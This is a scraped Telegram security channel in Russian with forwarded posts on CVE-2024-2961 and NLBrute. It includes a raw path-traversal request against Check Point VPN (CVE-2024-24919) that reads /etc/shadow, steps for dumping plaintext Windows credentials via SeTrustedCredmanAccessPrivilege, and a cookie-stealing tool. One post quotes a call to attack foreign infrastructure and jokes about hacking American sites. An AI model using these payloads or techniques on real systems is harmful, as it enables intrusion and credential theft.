#Beacon
1.19K subscribers
272 photos
26 videos
130 files
1.83K links
Прожаренный цуберпохек

[educational channel/white hat only] - do not try the knowledge from here on your home or other people's microwaves
Download Telegram
Магама топ контент как всегда😄
😡31🗿1
Forwarded from Proxy Bar
CVE-2024-2961 - тихоходка
*
Помните месяц назад был кипишь, относительно того что нашли дырку в glibc.
Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает Iconv со своим RCE.
*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine
Forwarded from C.I.T. Security
Гражданин России, обвиняемый в разработке хакерского инструмента NLBrute, впервые предстал перед судом на этой неделе во Флориде за использования инструмента «для создания криминальной империи». Панкову грозит до 47 лет тюремного заключения за мошенничество и компьютерные преступления.

#NLBrute, #криминальнаяимперия, #Панков @SecLabNews
Forwarded from Proxy Bar
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow


#0day #checkpoint
Пока без уникального контента, шо поделаешь, у админа экзамены, 2 высших образования получает🤒
3
Forwarded from RedTeam brazzers (Миша)
Продолжаем тему с извлечением учетных данных без взаимодействия с LSASS. Знали ли вы, что в системе Windows присутствует привилегия, которая позволяет извлекать учетные данные в открытом виде?

И имя её: SeTrustedCredmanAccessPrivilege

Если открыть документацию MSDN, то там написано, что эта привилегия позволяет:
Access Credential Manager as a trusted caller


То есть, получать доступ к Credential Manager. Казалось бы, зачем нам эта привилегия, если учетные данные из Credential Manager можно извлекать и просто путем злоупотребления DPAPI? Однако, не все так просто. Для добавления данных в Credential Manager используется API CredWrite() . Учетные данные чаще всего пушатся как CRED_TYPE_DOMAIN_PASSWORD.

На этот тип данных распространяется небольшое ограничение: LSASS не дает извлекать поле CredentialBlob, содержащее учетные данные, если они были добавлены как CRED_TYPE_DOMAIN_PASSWORD . Буквально, поле CredentialBlob, которое можно получить через функцию CredRead() или CredEnumerate(), будет пустым.

Так вот, привилегия SeTrustedCredmanAccessPrivilege позволяет обходить это ограничение и извлекать учетные данные в чистом виде.

С помощью этой привилегии у нас появляется возможность обращаться к API CredBackupCredentials() и дампить учетные данные. Данные будут записаны в файл, который возможно расшифровать через DPAPI и получить доступ к паролям.

Подробнее об этом прекрасном механизме написано тут , а вот некоторые POCи, которые осуществляют автоматическое извлечение:
- https://github.com/leftp/BackupCreds
- https://github.com/jsecu/CredManBOF/blob/main/CredMan.c

Помните, что необязательно иметь эту привилегию, ведь мы можем динамически ее навесить на токен процесса и все равно сдампить креды. В таком случае флоу атаки следующий: берем ЛА -> добавляем в токен SeTrustedCredmanAccessPrivilege -> обращаемся к API -> получаем креды
🤯21🤩1
Кто-то помнит curiv выкладывал вопросы на собес? Вот ответы на эти вопросы(кратко)

https://github.com/curiv/russian-offensive-security-questions
😈2
Очень небрежно, но как есть. Кому-то может спасти собес если даже модель оси не знаете)))
👾2
This media is not supported in your browser
VIEW IN TELEGRAM
🤯1😈1🙊1
[ CookieKatz ]

Dump cookies from Chrome, Edge or Msedgewebview2 directly from the process memory.

— Support dumping cookies from Chrome's Incogntio and Edge's In-Private processes
— Access cookies of other user's browsers when running elevated
— Dump cookies from webview processes
— No need to touch on-disk database file
— DPAPI keys not needed to decrypt the cookies
— Parse cookies offline from a minidump file

https://github.com/Meckazin/ChromeKatz
2🗿1🙊1
Forwarded from 
HOW TO UNSKID YOURSELF 101

[1.] Hacking: The Art of Exploitation, 2nd Edition
This book covers coding (C, x86 assembly), exploitation (stack overflow, heap overflow, Format String), Networking
(and network-based attacks), writing shellcode, countermeasures and some crypto. It's the very first book to read since it
doesn't expect you to know anything before you start, though some experience with a programming language will
certainly make things a lot easier.

[2.] Web application Hacker's Handbook, 2nd Edition
Covers pretty much all areas of web application security, could be seen as a reference guide, or a book to be read from
start to finish. I'd recommend reading at least the first chapters before jumping back and forth in the book.

[3.] Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration
http://opensecuritytraining.info/IntroX86.html
https://www.youtube.com/watch?v=H4Z0S9ZbC0g
A video course teaching you Intel x86, something you'll really want to know if you plan on pwning gibsons. It's a long
course, but absolutely amazing which gives you a real good foundation for learning Software Exploitation and Reverse
Engineering. Some of the stuff covered here are also in Hacking: The Art of Exploitation, but practice makes perfect.

[4.] Exploits 1: Introduction to Software Exploits
http://opensecuritytraining.info/Exploits1.html
https://www.youtube.com/watch?v=dGyWvGmBYVw&list=PL96AB65DFCE02EE3E
Another great video course from the guys over at OpenSecurityTraining.
Forwarded from KnightPentest🛡
Багбаунти выходит на новый уровень. 49 государств — это примерно четверть всех стран мира добавлены в "scope". Теперь такое понятие как "блэчер" больше не существует после цитаты Дмитрия Медведева:
Как реагировать? Я уже как-то говорил об этом, но нелишне и повторить.
Надо каждый день пытаться нанести максимальный вред тем странам, которые ввели против нашей страны и всех наших граждан эти ограничения. Вред во всём, в чём можно навредить. Вред их экономикам, их институтам и их правителям. Вред благополучию их граждан. Их уверенности в завтрашнем дне. Для этого надо и дальше искать критические уязвимости их экономик и бить по ним во всех сферах. Причинять ущерб во всех местах, парализуя работу их компаний и государственных учреждений. Находить проблемы в их важнейших технологиях и беспощадно наносить удары по ним. Буквально изничтожать их энергетику, промышленность, транспорт, банковские и социальные услуги. Наводить страх неминуемым коллапсом всей критической инфраструктуры.

Цитату взял отсюда https://t.me/medvedev_telegram/505


👍🏻 - Ждем райтапы на xss по поломке defi/мемкоинов американских.
🤝 - ломать чужие сайты плохо, лучше расскажу о баге вендору и получу выплату в 50$
🤝4🤷‍♀1🎉1
Red Team Scenarios.pdf
18 MB
Red Team Scenarios.pdf
👌1
Forwarded from BOOKS | كتب
Please open Telegram to view this post
VIEW IN TELEGRAM